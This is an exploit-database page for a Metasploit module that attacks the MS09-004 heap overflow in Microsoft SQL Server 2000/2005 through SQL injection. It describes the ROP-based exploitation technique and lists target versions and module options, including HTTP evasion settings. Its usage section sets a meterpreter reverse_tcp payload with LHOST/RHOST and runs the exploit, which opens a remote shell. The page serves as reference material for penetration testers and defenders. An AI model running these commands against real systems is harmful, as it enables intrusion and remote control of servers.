Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
A heap-based buffer overflow can occur when calling the undocumented "sp_replwritetovarbin" extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005 without any public mention. This exploit smashes several pointers, as shown below. 1. pointer to a 32-bit value that is set to 0 2. pointer to a 32-bit value that is set to a length influcenced by the buffer length. 3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the displacement is 0x10. The address of our buffer is conveniently stored in ecx when this instruction is executed. 4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, return oriented programming is used to normalize the execution state and finally execute the payload via a "jmp esp". All addresses used were found within the sqlservr.exe memory space, yielding very reliable code execution using only a single query. NOTE: The MSSQL server service does not automatically restart by default. That said, some exceptions are caught and will not result in terminating the process. If the exploit crashes the service prior to hijacking the stack, it won't die. Otherwise, it's a goner.
Exploit Rank
- Excellent
Exploit Authors
- jduck < jduck [at] metasploit.com >
- Rodrigo Marcos < >
Vulnerability References
- OSVDB-50589
- CVE-2008-5416
- BID-32710
- MSB-MS09-004
- http://www.milw0rm.com/exploits/7501
- http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/
Exploit Targets
- 0 - Automatic (default)
- 1 - MSSQL 2000 / MSDE SP0 (8.00.194)
- 2 - MSSQL 2000 / MSDE SP1 (8.00.384)
- 3 - MSSQL 2000 / MSDE SP2 (8.00.534)
- 4 - MSSQL 2000 / MSDE SP3 (8.00.760)
- 5 - MSSQL 2000 / MSDE SP4 (8.00.2039)
- 6 - MSSQL 2005 SP0 (9.00.1399.06)
- 7 - MSSQL 2005 SP1 (9.00.2047.00)
- 8 - MSSQL 2005 SP2 (9.00.3042.00)
- 9 - CRASHER
Exploit Development
Similar Exploit Modules
- exploit/windows/mssql/lyris_listmanager_weak_pass
- exploit/windows/mssql/ms02_039_slammer
- exploit/windows/mssql/ms02_056_hello
- exploit/windows/mssql/ms09_004_sp_replwritetovarbin
- exploit/windows/mssql/mssql_payload
- exploit/windows/mssql/mssql_payload_sqli
Exploit Usage Information
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli
msf exploit(ms09_004_sp_replwritetovarbin_sqli) > show payloads
msf exploit(ms09_004_sp_replwritetovarbin_sqli) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms09_004_sp_replwritetovarbin_sqli) > set LHOST [MY IP ADDRESS]
msf exploit(ms09_004_sp_replwritetovarbin_sqli) > set RHOST [TARGET IP]
msf exploit(ms09_004_sp_replwritetovarbin_sqli) > exploit
Exploit Module Options
| COOKIE | Cookie value (default: ) |
| DATA | POST data, if necessary, with [SQLi] indicating the injection (default: ) |
| GET_PATH | The complete path with [SQLi] indicating the injection (default: /) |
| METHOD | GET or POST (default: GET) |
| Proxies | Use a proxy chain |
| RHOST | The target address |
| RPORT | The target port (default: 80) |
| VHOST | HTTP server virtual host |
| BasicAuthPass | The HTTP password to specify for basic authentication |
| BasicAuthUser | The HTTP username to specify for basic authentication |
| ContextInformationFile | The information file that contains context information |
| DOMAIN | The domain to use for windows authentification |
| DigestAuthIIS | Conform to IIS, should work for most servers. Only set to false for non-IIS servers |
| DigestAuthPassword | The HTTP password to specify for digest authentication |
| DigestAuthUser | The HTTP username to specify for digest authentication |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| FingerprintCheck | Conduct a pre-exploit fingerprint verification |
| HEX2BINARY | The path to the hex2binary script on the disk |
| NTLM::SendLM | Always send the LANMAN response (except when NTLMv2_session is specified) |
| NTLM::SendNTLM | Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses |
| NTLM::SendSPN | Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required |
| NTLM::UseLMKey | Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent |
| NTLM::UseNTLM2_session | Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session |
| NTLM::UseNTLMv2 | Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true |
| SSL | Negotiate SSL for outgoing connections |
| SSLVersion | Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1) |
| UserAgent | The User-Agent header to use for all requests |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |
| HTTP::header_folding | Enable folding of HTTP headers |
| HTTP::method_random_case | Use random casing for the HTTP method |
| HTTP::method_random_invalid | Use a random invalid, HTTP method for request |
| HTTP::method_random_valid | Use a random, but valid, HTTP method for request |
| HTTP::pad_fake_headers | Insert random, fake headers into the HTTP request |
| HTTP::pad_fake_headers_count | How many fake headers to insert into the HTTP request |
| HTTP::pad_get_params | Insert random, fake query string variables into the request |
| HTTP::pad_get_params_count | How many fake query string variables to insert into the request |
| HTTP::pad_method_uri_count | How many whitespace characters to use between the method and uri |
| HTTP::pad_method_uri_type | What type of whitespace to use between the method and uri (accepted: space, tab, apache) |
| HTTP::pad_post_params | Insert random, fake post variables into the request |
| HTTP::pad_post_params_count | How many fake post variables to insert into the request |
| HTTP::pad_uri_version_count | How many whitespace characters to use between the uri and version |
| HTTP::pad_uri_version_type | What type of whitespace to use between the uri and version (accepted: space, tab, apache) |
| HTTP::uri_dir_fake_relative | Insert fake relative directories into the uri |
| HTTP::uri_dir_self_reference | Insert self-referential directories into the uri |
| HTTP::uri_encode_mode | Enable URI encoding (accepted: none, hex-normal, hex-all, hex-random, u-normal, u-all, u-random) |
| HTTP::uri_fake_end | Add a fake end of URI (eg: /%20HTTP/1.0/../../) |
| HTTP::uri_fake_params_start | Add a fake start of params to the URI (eg: /%3fa=b/../) |
| HTTP::uri_full_url | Use the full URL for all HTTP requests |
| HTTP::uri_use_backslashes | Use back slashes instead of forward slashes in the uri |